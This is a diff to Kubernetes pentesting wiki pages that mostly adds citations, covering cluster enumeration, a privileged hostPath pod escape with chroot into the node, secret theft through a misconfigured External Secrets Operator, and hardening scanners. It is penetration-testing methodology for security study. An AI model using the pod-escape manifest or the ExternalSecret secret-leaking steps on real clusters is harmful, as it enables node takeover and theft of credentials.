@@ -179,7 +183,7 @@ kubectl config set-credentials USER_NAME \
 
 ### Get Supported Resources
 
-With this info you will know all the services you can list
+With this info you will know all the services you can list. <sup>[[11]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -194,7 +198,7 @@ k api-resources --namespaced=false #Resources NOT specific to a namespace
 
 ### Object metadata worth checking
 
-When you can read an object, export the full YAML or JSON instead of relying only on table output or `describe`. The most useful security context is often in generic object fields that exist across many resource types:
+When you can read an object, export the full YAML or JSON instead of relying only on table output or `describe`. The most useful security context is often in generic object fields that exist across many resource types. <sup>[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 kubectl get pod <pod> -n <ns> -o yaml
@@ -202,16 +206,16 @@ kubectl get deploy <deploy> -n <ns> -o json | jq '.metadata, .spec, .status'
 kubectl get pods -A -o custom-columns='NS:.metadata.namespace,NAME:.metadata.name,SA:.spec.serviceAccountName,NODE:.spec.nodeName,PHASE:.status.phase'
 ```
 
-- `metadata.uid`, `name`, `namespace`, `apiVersion` and `kind` identify the exact object and avoid confusion between objects with the same name in different namespaces or API groups.
-- `metadata.labels` and selectors connect Services, Deployments, ReplicaSets, Pods, NetworkPolicies and automation. Following selectors is often the fastest way to identify the real backend pods for a Service.
-- `metadata.annotations` can leak operational context such as ingress behavior, cloud load balancer settings, GitOps or Helm metadata, policy exemptions, and service mesh configuration. They should not contain secrets, but real clusters often expose useful clues there.
-- `metadata.ownerReferences` shows controller lineage. If a Pod is owned by a ReplicaSet owned by a Deployment, changing or deleting only the Pod usually does not fix the source.
-- `metadata.finalizers` and `metadata.deletionTimestamp` explain resources stuck in deletion and can reveal cleanup controllers or persistence/disruption tricks.
-- `status`, Events, and conditions can reveal node placement, pod IPs, image IDs, failure messages, scheduling issues, admission denials, and controller progress. They are useful clues, but audit logs are still required to prove who performed an action.
+- `metadata.uid`, `name`, `namespace`, `apiVersion` and `kind` identify the exact object and avoid confusion between objects with the same name in different namespaces or API groups. <sup>[[11]](#references)</sup>
+- `metadata.labels` and selectors connect Services, Deployments, ReplicaSets, Pods, NetworkPolicies and automation. Following selectors is often the fastest way to identify the real backend pods for a Service. <sup>[[25]](#references)</sup>
+- `metadata.annotations` can leak operational context such as ingress behavior, cloud load balancer settings, GitOps or Helm metadata, policy exemptions, and service mesh configuration. They should not contain secrets, but real clusters often expose useful clues there. <sup>[[26]](#references)</sup>
+- `metadata.ownerReferences` shows controller lineage. If a Pod is owned by a ReplicaSet owned by a Deployment, changing or deleting only the Pod usually does not fix the source. <sup>[[27]](#references)</sup>
+- `metadata.finalizers` and `metadata.deletionTimestamp` explain resources stuck in deletion and can reveal cleanup controllers or persistence/disruption tricks. <sup>[[28]](#references)</sup>
+- `status`, Events, and conditions can reveal node placement, pod IPs, image IDs, failure messages, scheduling issues, admission denials, and controller progress. They are useful clues, but audit logs are still required to prove who performed an action. <sup>[[11]](#references)[[29]](#references)</sup>
 
 ### Dynamic Resource Allocation and device evidence
 
-If the cluster uses GPUs, NICs, FPGAs, or other specialized hardware, check whether Kubernetes Dynamic Resource Allocation (DRA) is present. DRA uses `resource.k8s.io` objects such as `DeviceClass`, `ResourceSlice`, `ResourceClaim`, and `ResourceClaimTemplate` to describe available devices and claim them for Pods. These objects can reveal which nodes can access valuable hardware, which driver manages it, and which workload has an allocation.
+If the cluster uses GPUs, NICs, FPGAs, or other specialized hardware, check whether Kubernetes Dynamic Resource Allocation (DRA) is present. DRA uses `resource.k8s.io` objects such as `DeviceClass`, `ResourceSlice`, `ResourceClaim`, and `ResourceClaimTemplate` to describe available devices and claim them for Pods. These objects can reveal which nodes can access valuable hardware, which driver manages it, and which workload has an allocation. <sup>[[30]](#references)</sup>
 
 ```bash
 kubectl api-resources --api-group=resource.k8s.io
@@ -223,11 +227,11 @@ kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.me
 kubectl get daemonsets,pods -A -o wide | grep -Ei 'dra|device|gpu|nvidia|amd|intel|sriov|fpga'
 ```
 
-During review, restrict writes to cluster-scoped `DeviceClass` and `ResourceSlice` objects to admins and DRA drivers, and keep `ResourceClaim` / `ResourceClaimTemplate` rights scoped to the namespaces that need them. Driver permissions to update `ResourceClaim` status should be explicit and narrow. On nodes, the kubelet PodResources API is commonly exposed through `/var/lib/kubelet/pod-resources/kubelet.sock`; monitoring DaemonSets may mount that directory to inspect assigned devices, so review those Pods like other privileged node agents.
+During review, restrict writes to cluster-scoped `DeviceClass` and `ResourceSlice` objects to admins and DRA drivers, and keep `ResourceClaim` / `ResourceClaimTemplate` rights scoped to the namespaces that need them. Driver permissions to update `ResourceClaim` status should be explicit and narrow. On nodes, the kubelet PodResources API is commonly exposed through `/var/lib/kubelet/pod-resources/kubelet.sock`; monitoring DaemonSets may mount that directory to inspect assigned devices, so review those Pods like other privileged node agents. <sup>[[31]](#references)[[32]](#references)</sup>
 
 ### ClusterTrustBundle and add-on certificate trust
 
-Recent clusters may expose `ClusterTrustBundle` objects in the `certificates.k8s.io` API group. They are cluster-scoped X.509 trust anchor bundles that Pods can mount through projected volumes. Broad read access is expected, but write access is sensitive because changing trusted roots can affect webhooks, aggregated APIs, service meshes, and applications that consume cluster-distributed CA material.
+Recent clusters may expose `ClusterTrustBundle` objects in the `certificates.k8s.io` API group. They are cluster-scoped X.509 trust anchor bundles that Pods can mount through projected volumes. Broad read access is expected, but write access is sensitive because changing trusted roots can affect webhooks, aggregated APIs, service meshes, and applications that consume cluster-distributed CA material. <sup>[[33]](#references)[[34]](#references)</sup>
 
 ```bash
 kubectl api-resources --api-group=certificates.k8s.io | grep -i clustertrustbundle
@@ -237,9 +241,11 @@ kubectl get pods -A -o yaml | grep -n -E 'clusterTrustBundle|trustBundle|caBundl
 kubectl get apiservices -o jsonpath='{range .items[*]}{.metadata.name}{" insecure="}{.spec.insecureSkipTLSVerify}{" service="}{.spec.service.namespace}{"/"}{.spec.service.name}{"\n"}{end}'
 ```
 
-During review, record `signerName`, bundle fingerprints, writer identities, projected-volume consumers, and any trust-distribution controller such as cert-manager trust-manager. Treat `APIService` objects with `insecureSkipTLSVerify: true`, stale `caBundle` values, or broad permissions to patch APIService/webhook trust fields as certificate-trust findings rather than ordinary object inventory.
+During review, record `signerName`, bundle fingerprints, writer identities, projected-volume consumers, and any trust-distribution controller such as cert-manager trust-manager. Treat `APIService` objects with `insecureSkipTLSVerify: true`, stale `caBundle` values, or broad permissions to patch APIService/webhook trust fields as certificate-trust findings rather than ordinary object inventory. <sup>[[34]](#references)[[35]](#references)</sup>
 
 ### Get Current Privileges
+
+The `SelfSubjectRulesReview` API reports the rules currently available to the caller in a namespace, although the result can be incomplete. <sup>[[12]](#references)[[13]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -266,7 +272,7 @@ kurl -i -s -k -X $'POST' \
 {{#endtab }}
 {{#endtabs }}
 
-Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
+Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess) <sup>[[14]](#references)</sup>\*\*\*\*
 
 You can learn more about **Kubernetes RBAC** in:
 
@@ -377,7 +383,7 @@ kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
 
 ### Get Deployments
 
-Deployments specify the desired state for stateless application workloads. They create ReplicaSets, and those ReplicaSets create Pods.
+Deployments specify the desired state for stateless application workloads. They create ReplicaSets, and those ReplicaSets create Pods. <sup>[[15]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -400,7 +406,7 @@ kurl -v https://$APISERVER/apis/apps/v1/namespaces/<namespace>/deployments/
 
 ### Get StatefulSets
 
-StatefulSets manage Pods that need stable names, ordered rollout behavior, and often per-replica persistent volumes.
+StatefulSets manage Pods that need stable names, ordered rollout behavior, and often per-replica persistent volumes. <sup>[[16]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -423,7 +429,7 @@ kurl -v https://$APISERVER/apis/apps/v1/namespaces/<namespace>/statefulsets/
 
 ### Get Pods
 
-The Pods are the actual **containers** that will **run**.
+The Pods are the actual **containers** that will **run**. <sup>[[17]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -446,7 +452,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
 
 ### Get Services
 
-Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
+Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. <sup>[[18]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -469,7 +475,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/services/
 
 ### Get nodes
 
-Get all the **nodes configured inside the cluster**.
+Get all the **nodes configured inside the cluster**. <sup>[[19]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -491,7 +497,7 @@ kurl -v https://$APISERVER/api/v1/nodes/
 
 ### Get DaemonSets
 
-**DaemonSets** ensure that a **specific Pod is running on all selected nodes** of the cluster. If you delete the DaemonSet, the Pods managed by it will also be removed.
+**DaemonSets** ensure that a **specific Pod is running on all selected nodes** of the cluster. If you delete the DaemonSet, the Pods managed by it will also be removed. <sup>[[20]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -513,7 +519,7 @@ kurl -v https://$APISERVER/apis/apps/v1/namespaces/<namespace>/daemonsets
 
 ### Get Jobs
 
-Jobs create Pods that run until completion. They are commonly used for migrations, backups, batch work, and one-off administrative tasks.
+Jobs create Pods that run until completion. They are commonly used for migrations, backups, batch work, and one-off administrative tasks. <sup>[[21]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -536,7 +542,7 @@ kurl -v https://$APISERVER/apis/batch/v1/namespaces/<namespace>/jobs
 
 ### Get CronJobs
 
-CronJobs use a crontab-like schedule to create Jobs that launch Pods for task-style execution.
+CronJobs use a crontab-like schedule to create Jobs that launch Pods for task-style execution. <sup>[[22]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -559,7 +565,7 @@ kurl -v https://$APISERVER/apis/batch/v1/namespaces/<namespace>/cronjobs
 
 ### Get configMap
 
-configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service.
+configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service. <sup>[[23]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="kubectl" }}
@@ -580,6 +586,8 @@ kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
 {{#endtabs }}
 
 ### Get Network Policies / Cilium Network Policies
+
+NetworkPolicies control ingress and egress for selected Pods; inspect both directions and any Cilium-specific policies exposed by the cluster. <sup>[[24]](#references)</sup>
 
 {{#tabs }}
 {{#tab name="First Tab" }}
@@ -631,11 +639,11 @@ k top pod --all-namespaces
 
 ## Interacting with the cluster without using kubectl
 
-Seeing that Kubernetes control plane exposes a REST-ful API, you can hand-craft HTTP requests and send them with other tools, such as **curl** or **wget**.
+Seeing that Kubernetes control plane exposes a REST-ful API, you can hand-craft HTTP requests and send them with other tools, such as **curl** or **wget**. <sup>[[11]](#references)</sup>
 
 ### Escaping from the pod
 
-If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
+If you are able to create new pods you might be able to escape from them to the node. A `hostPath` that mounts `/`, especially when combined with privileged or host-namespace settings, can expose the node filesystem and enable this kind of breakout. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. <sup>[[36]](#references)[[37]](#references)[[38]](#references)[[41]](#references)[[42]](#references)</sup>
 
 ```bash
 kubectl get pod <name> [-n <namespace>] -o yaml
@@ -645,7 +653,7 @@ kubectl get pod <name> [-n <namespace>] -o yaml
 >
 > `k get nodes --show-labels`
 >
-> Commonly, kubernetes.io/hostname and node-role.kubernetes.io/master are all good label for select.
+> Commonly, kubernetes.io/hostname and node-role.kubernetes.io/master are all good label for select. <sup>[[39]](#references)</sup>
 
 Then you create your attack.yaml file
 
@@ -679,7 +687,7 @@ spec:
   #  node-role.kubernetes.io/master: ""
 ```
 
-[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
+[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba) <sup>[[40]](#references)</sup>
 
 After that you create the pod
 
@@ -699,11 +707,13 @@ And finally you chroot into the node's system
 chroot /root /bin/bash
 ```
 
-Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
+Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) <sup>[[41]](#references)[[42]](#references)</sup>
 
 ### Creating a privileged pod
 
 The corresponding yaml file is as follows:
+
+This manifest combines privileged mode, host namespaces, and a `hostPath` mount; those settings weaken common Pod isolation controls and should be reviewed as a node or cluster escape risk. <sup>[[36]](#references)[[37]](#references)[[38]](#references)</sup>
 
 ```yaml
 apiVersion: v1
@@ -733,7 +743,7 @@ spec:
         path: /
 ```
 
-Create the pod with curl:
+Create the pod with curl: <sup>[[11]](#references)</sup>
 
 ```bash
 CONTROL_PLANE_HOST=""
@@ -938,8 +948,47 @@ ccurl --path-as-is -i -s -k -X $'DELETE' \
 
 ## References
 
-{{#ref}}
-https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
-{{#endref}}
+- [1] [Kubernetes Pentest Methodology Part 3](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
+- [2] [Configure Service Accounts for Pods](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server)
+- [3] [Service Accounts](https://kubernetes.io/docs/concepts/security/service-accounts/)
+- [4] [Accessing the Kubernetes API from a Pod](https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/)
+- [5] [Organizing Cluster Access Using kubeconfig Files](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/)
+- [6] [PKI certificates and requirements](https://kubernetes.io/docs/setup/best-practices/certificates/)
+- [7] [K9s Commands](https://k9scli.io/topics/commands/)
+- [8] [Lens](https://k8slens.dev/)
+- [9] [Install kubectl binary with curl on Linux](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux)
+- [10] [kubectl Quick Reference](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
+- [11] [Kubernetes API Concepts](https://kubernetes.io/docs/reference/using-api/api-concepts/)
+- [12] [RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- [13] [SelfSubjectRulesReview](https://kubernetes.io/docs/reference/kubernetes-api/definitions/self-subject-rules-review-v1-authorization/)
+- [14] [rakkess](https://github.com/corneliusweig/rakkess)
+- [15] [Deployments](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+- [16] [StatefulSets](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/)
+- [17] [Pods](https://kubernetes.io/docs/concepts/workloads/pods/)
+- [18] [Service](https://kubernetes.io/docs/concepts/services-networking/service/)
+- [19] [Nodes](https://kubernetes.io/docs/concepts/architecture/nodes/)
+- [20] [DaemonSet](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/)
+- [21] [Jobs](https://kubernetes.io/docs/concepts/workloads/controllers/job/)
+- [22] [CronJob](https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/)
+- [23] [ConfigMaps](https://kubernetes.io/docs/concepts/configuration/configmap/)
+- [24] [Network Policies](https://kubernetes.io/docs/concepts/services-networking/network-policies/)
+- [25] [Labels and Selectors](https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/)
+- [26] [Annotations](https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/)
+- [27] [Owners and Dependents](https://kubernetes.io/docs/concepts/overview/working-with-objects/owners-dependents/)
+- [28] [Finalizers](https://kubernetes.io/docs/concepts/overview/working-with-objects/finalizers/)
+- [29] [Auditing](https://kubernetes.io/docs/tasks/debug/debug-cluster/audit/)
+- [30] [Dynamic Resource Allocation](https://kubernetes.io/docs/concepts/scheduling-eviction/dynamic-resource-allocation/)
+- [31] [Dynamic Resource Allocation security](https://kubernetes.io/docs/concepts/security/hardening-guide/dynamic-resource-allocation/)
+- [32] [Device Plugins](https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/device-plugins/)
+- [33] [ClusterTrustBundle projected volumes](https://kubernetes.io/docs/concepts/storage/projected-volumes/#clustertrustbundle-projected-volumes)
+- [34] [ClusterTrustBundle v1beta1](https://kubernetes.io/docs/reference/kubernetes-api/certificates/cluster-trust-bundle-v1beta1/)
+- [35] [API Aggregation Layer](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/)
+- [36] [HostPath volumes](https://kubernetes.io/docs/concepts/storage/volumes/#hostpath)
+- [37] [Pod Security Standards](https://kubernetes.io/docs/concepts/security/pod-security-standards/)
+- [38] [Security Context](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)
+- [39] [Assigning Pods to Nodes](https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/)
+- [40] [Kubernetes Pod hostPath Volume Mount](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
+- [41] [Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
+- [42] [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
@@ -4,7 +4,7 @@
 
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
-This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets.
+This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets into Kubernetes.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ## Disclaimer
 
@@ -13,12 +13,12 @@ The technique showed below can only work when certain circumstances are met. For
 ## Prerequisites
 
 1. A foothold in a kubernetes / openshift cluster with admin privileges on a namespace
-2. Read access on at least ExternalSecret at cluster level
-3. Figure out if there are any required labels / annotations or group membership needed which allows ESO to sync your secret. If you're lucky, you can freely steal any defined secret.
+2. Read access on the `ExternalSecret` resources in the namespaces you need to inspect; cluster-wide enumeration requires the corresponding cluster-scoped RBAC.<sup>[[5]](#references)</sup>
+3. Figure out if there are any required labels / annotations, group membership, or `ClusterSecretStore` namespace conditions needed which allow ESO to sync your secret. If those restrictions do not apply, you may be able to retrieve any secret the store can read.<sup>[[5]](#references)</sup>
 
 ### Gathering information about existing ClusterSecretStore
 
-Assuming that you have a users which has enough rights to read this resource; start by first listing existing _**ClusterSecretStores**_.
+Assuming that you have a users which has enough rights to read this resource; start by first listing existing _**ClusterSecretStores**_. A `ClusterSecretStore` is cluster-scoped and can be referenced by `ExternalSecret` resources in all namespaces, subject to its configured conditions.<sup>[[4]](#references)</sup>
 
 ```sh
 kubectl get ClusterSecretStore
@@ -32,7 +32,7 @@ Let's assume you found a ClusterSecretStore named _**mystore**_. Continue by enu
 kubectl get externalsecret -A | grep mystore
 ```
 
-_This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._
+_This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._<sup>[[5]](#references)</sup>
 
 You should get a list of defined externalsecret. Let's assume you found an externalsecret object called _**mysecret**_ defined and used by namespace _**mynamespace**_. Gather a bit more information about what kind of secret it holds.
 
@@ -42,7 +42,7 @@ kubectl get externalsecret myexternalsecret -n mynamespace -o yaml
 
 ### Assembling the pieces
 
-From here you can get the name of one or multiple secret names (such as defined in the Secret resource). You will an output similar to:
+From here you can get the name of one or multiple secret names (such as defined in the Secret resource). The `spec.data` entries map Kubernetes Secret keys to provider data through `secretKey` and `remoteRef`, while `conversionStrategy` and `decodingStrategy` control value handling.<sup>[[3]](#references)</sup> You will an output similar to:
 
 ```yaml
 kind: ExternalSecret
@@ -67,7 +67,7 @@ So far we got:
 - Name of an ExternalSecret
 - Name of the secret
 
-Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ):
+Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ). `secretStoreRef` may select a `ClusterSecretStore`, and `target` controls the resulting Kubernetes Secret and its ownership/deletion behavior.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ```yaml
 kind: ExternalSecret
@@ -103,7 +103,7 @@ metadata:
   name: evilnamespace
 ```
 
-After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace
+After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```sh
 kubectl get secret leaked_secret -o yaml
@@ -111,14 +111,10 @@ kubectl get secret leaked_secret -o yaml
 
 ## References
 
-{{#ref}}
-https://external-secrets.io/latest/
-{{#endref}}
-
-{{#ref}}
-https://github.com/external-secrets/external-secrets
-{{#endref}}
-
-
+- [1] [External Secrets Operator documentation](https://external-secrets.io/latest/)
+- [2] [External Secrets Operator source repository](https://github.com/external-secrets/external-secrets)
+- [3] [ExternalSecret API](https://external-secrets.io/latest/api/externalsecret/)
+- [4] [ClusterSecretStore API](https://external-secrets.io/latest/api/clustersecretstore/)
+- [5] [Security best practices](https://external-secrets.io/latest/guides/security-best-practices/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -6,7 +6,7 @@
 
 ### [Steampipe - Kubernetes Compliance](https://github.com/turbot/steampipe-mod-kubernetes-compliance)
 
-It's will **several compliance checks over the Kubernetes cluster**. It includes support for CIS, National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) Cybersecurity technical report for Kubernetes hardening.
+It's will **several compliance checks over the Kubernetes cluster**. It includes support for CIS, National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) Cybersecurity technical report for Kubernetes hardening.<sup>[[1]](#references)</sup>
 
 ```bash
 # Install Steampipe
@@ -29,7 +29,7 @@ powerpipe server
 
 ### [**Kubescape**](https://github.com/armosec/kubescape)
 
-[**Kubescape**](https://github.com/armosec/kubescape) is a K8s open-source tool providing a multi-cloud K8s single pane of glass, including risk analysis, security compliance, RBAC visualizer and image vulnerabilities scanning. Kubescape scans K8s clusters, YAML files, and HELM charts, detecting misconfigurations according to multiple frameworks (such as the [NSA-CISA](https://www.armosec.io/blog/kubernetes-hardening-guidance-summary-by-armo) , [MITRE ATT\&CK®](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)), software vulnerabilities, and RBAC (role-based-access-control) violations at early stages of the CI/CD pipeline, calculates risk score instantly and shows risk trends over time.
+[**Kubescape**](https://github.com/armosec/kubescape) is a K8s open-source tool providing a multi-cloud K8s single pane of glass, including risk analysis, security compliance, RBAC visualizer and image vulnerabilities scanning. Kubescape scans K8s clusters, YAML files, and HELM charts, detecting misconfigurations according to multiple frameworks (such as the [NSA-CISA](https://www.armosec.io/blog/kubernetes-hardening-guidance-summary-by-armo) , [MITRE ATT\&CK®](https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)), software vulnerabilities, and RBAC (role-based-access-control) violations at early stages of the CI/CD pipeline, calculates risk score instantly and shows risk trends over time.<sup>[[2]](#references)</sup>
 
 ```bash
 curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash
@@ -38,11 +38,11 @@ kubescape scan --verbose
 
 ### [**Popeye**](https://github.com/derailed/popeye)
 
-[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
+[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.<sup>[[3]](#references)</sup>
 
 ### [**Kube-bench**](https://github.com/aquasecurity/kube-bench)
 
-The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
+The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).<sup>[[4]](#references)[[5]](#references)</sup>\
 You can choose to:
 
 - run kube-bench from inside a container (sharing PID namespace with the host)
@@ -52,19 +52,19 @@ You can choose to:
 
 ### [**Kubeaudit**](https://github.com/Shopify/kubeaudit)
 
-**[DEPRECATED]** The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.
+**[DEPRECATED]** The tool [**kubeaudit**](https://github.com/Shopify/kubeaudit) is a command line tool and a Go package to **audit Kubernetes clusters** for various different security concerns.<sup>[[6]](#references)</sup>
 
-Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:
+Kubeaudit can detect if it is running within a container in a cluster. If so, it will try to audit all Kubernetes resources in that cluster:<sup>[[6]](#references)</sup>
 
 ```
 kubeaudit all
 ```
 
-This tool also has the argument `autofix` to **automatically fix detected issues.**
+This tool also has the argument `autofix` to **automatically fix detected issues.**<sup>[[6]](#references)</sup>
 
 ### [**Kube-hunter**](https://github.com/aquasecurity/kube-hunter)
 
-**[DEPRECATED]** The tool [**kube-hunter**](https://github.com/aquasecurity/kube-hunter) hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments.
+**[DEPRECATED]** The tool [**kube-hunter**](https://github.com/aquasecurity/kube-hunter) hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments.<sup>[[7]](#references)</sup>
 
 ```bash
 kube-hunter --remote some.node.com
@@ -72,7 +72,7 @@ kube-hunter --remote some.node.com
 
 ### [Trivy](https://github.com/aquasecurity/trivy)
 
-[Trivy](https://github.com/aquasecurity/trivy) has scanners that look for security issues, and targets where it can find those issues:
+[Trivy](https://github.com/aquasecurity/trivy) has scanners that look for security issues, and targets where it can find those issues:<sup>[[8]](#references)</sup>
 
 - Container Image
 - Filesystem
@@ -85,37 +85,41 @@ kube-hunter --remote some.node.com
 
 **[Looks like unmantained]**
 
-[**Kubei**](https://github.com/Erezf-p/kubei) is a vulnerabilities scanning and CIS Docker benchmark tool that allows users to get an accurate and immediate risk assessment of their kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods.
+[**Kubei**](https://github.com/Erezf-p/kubei) is a vulnerabilities scanning and CIS Docker benchmark tool that allows users to get an accurate and immediate risk assessment of their kubernetes clusters. Kubei scans all images that are being used in a Kubernetes cluster, including images of application pods and system pods.<sup>[[9]](#references)</sup>
 
 ### [**KubiScan**](https://github.com/cyberark/KubiScan)
 
-[**KubiScan**](https://github.com/cyberark/KubiScan) is a tool for scanning Kubernetes cluster for risky permissions in Kubernetes's Role-based access control (RBAC) authorization model.
+[**KubiScan**](https://github.com/cyberark/KubiScan) is a tool for scanning Kubernetes cluster for risky permissions in Kubernetes's Role-based access control (RBAC) authorization model.<sup>[[10]](#references)</sup>
 
 ### [Managed Kubernetes Auditing Toolkit](https://github.com/DataDog/managed-kubernetes-auditing-toolkit)
 
-[**Mkat**](https://github.com/DataDog/managed-kubernetes-auditing-toolkit) is a tool built to test other type of high risk checks compared with the other tools. It mainly have 3 different modes:
